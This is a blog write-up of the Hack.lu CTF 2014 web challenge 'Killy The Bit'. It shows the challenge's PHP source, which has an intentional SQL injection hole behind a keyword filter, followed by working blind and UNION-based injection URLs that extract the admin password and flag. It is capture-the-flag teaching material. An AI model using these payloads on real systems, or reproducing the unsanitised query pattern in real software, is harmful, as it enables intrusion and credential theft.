23 October 2014

HACK.LU CTF 2014: Killy The Bit WRITEUP

Killy the Bit is one of the dangerous kittens of the wild west. He already flipped bits in most of the states and recently hacked the Royal Bank of Fluxembourg. All customer of the bank are now advised to change their password for the next release of the bank's website which will be launched on the 23.10.2014 10:01 CEST.

Killy the Bit stands in your debt and sent the following link. Can you break the password generation process in order to get access to the admin account?


the webservice source code was given
1:  <?php  
2:  include 'config.php';  
3:    
4:  echo "<html><head><style type='text/css'><!-- body {background-image: url(bg.jpg);background-repeat: no-repeat;height: Percent;width: Percent; background-size: cover;}//--></style> <title>Royal Bank of Fluxembourg</title></head></html>";  
5:    
6:  <!-- blind? we will kill you :) -->  
7:  if(isset($_GET['name']) && $_GET['name']!='' && !preg_match('/sleep|benchmark|and|or|\||&/i',$_GET['name'])) {  
8:       $res = mysql_query("SELECT name,email FROM user where name='".$_GET['name']."'");  
9:    
10:       if(mysql_fetch_object($res)) {            
11:            // Generation of new password  
12:            //<topsecure content>  
13:            // this was filtered during the creation of the phps file  
14:            //</topsecure content>  
15:            die("A new password was generated and sent to your email address!");  
16:       } else {  
17:    
18:    
19:       $res = mysql_query("SELECT name,email FROM user where name sounds like '".$_GET['name']."'");  
20:    
21:            if(mysql_fetch_object($res)) {  
22:                 echo "We couldn't find your username, but it sounds like this user:<br>";  
23:            } else {  
24:                 die("We couldn't find your username!<br>Are you sure it is ".htmlspecialchars($_GET['name'],ENT_QUOTES, 'utf-8')."?");  
25:            }  
26:      $res = mysql_query("SELECT name,email FROM user where name sounds like '".$_GET['name']."'");  
27:    
28:            while($row = mysql_fetch_object($res)) {  
29:              echo $row->name;  
30:              echo "<br>";  
31:            }  
32:       }  
33:  } else {  
34:    
35:  echo "<div style='width:800px; margin:0 auto;'><hr><h1><center>Royal Bank of Fluxembourg<center></h1><hr><br><br>Dear users,<br>We were hacked by Killy the Bit! Please use this site to generate your new password. Login will be available on the 23.10.2014 10:01 CEST<br><br><br></div>";  
36:        echo '<div style="width:400px;margin:0 auto;"<pre><img src=wanted.png></img></pre><br><br>';  
37:       echo '<form action="#" method="get">Please enter your username: <br><input type="text" name="name"><br><input type="submit" name="submit" value="Generate"></form></div>';  
38:  }  
39:    
40:  ?>  
41:    


checking the code we find an obvious SQL injection vulnerability with (AND, OR, &, |, sleep, benchmark ) as filter
at first i've exploited it blindly this way
https://wildwildweb.fluxfingers.net:1424/?submit=Generate&name=-1%27+UNION+ALL+SELECT+*+FROM+%28SELECT+name%2Cpasswd+FROM+user+WHERE+name%3D%27admin%27%29f+WHERE+passwd+like+binary+0x[hexedchar]--+-

it works, but not really cute since our flag is 58chars long, it will take ages,
but since we have union we can manipulate the results this way to print flag in a single request

first we have to go to the 2nd query which uses sounds like, so our user must be not 'admin' but sounds like 'admin' => 'admi' or anything else would work

so final payload is
https://wildwildweb.fluxfingers.net:1424/?submit=Generate&name=admi%27%20union%20select%20passwd,2%20from%20user%20where%20name%20like%20%27admi%25%27%20limit%201,1%20--+-

and our output is:
We couldn't find your username, but it sounds like this user:
flag{Killy_The_Bit_Is_Wanted_for_9000_$$_FoR_FlipPing_Bits}




No comments:

Post a Comment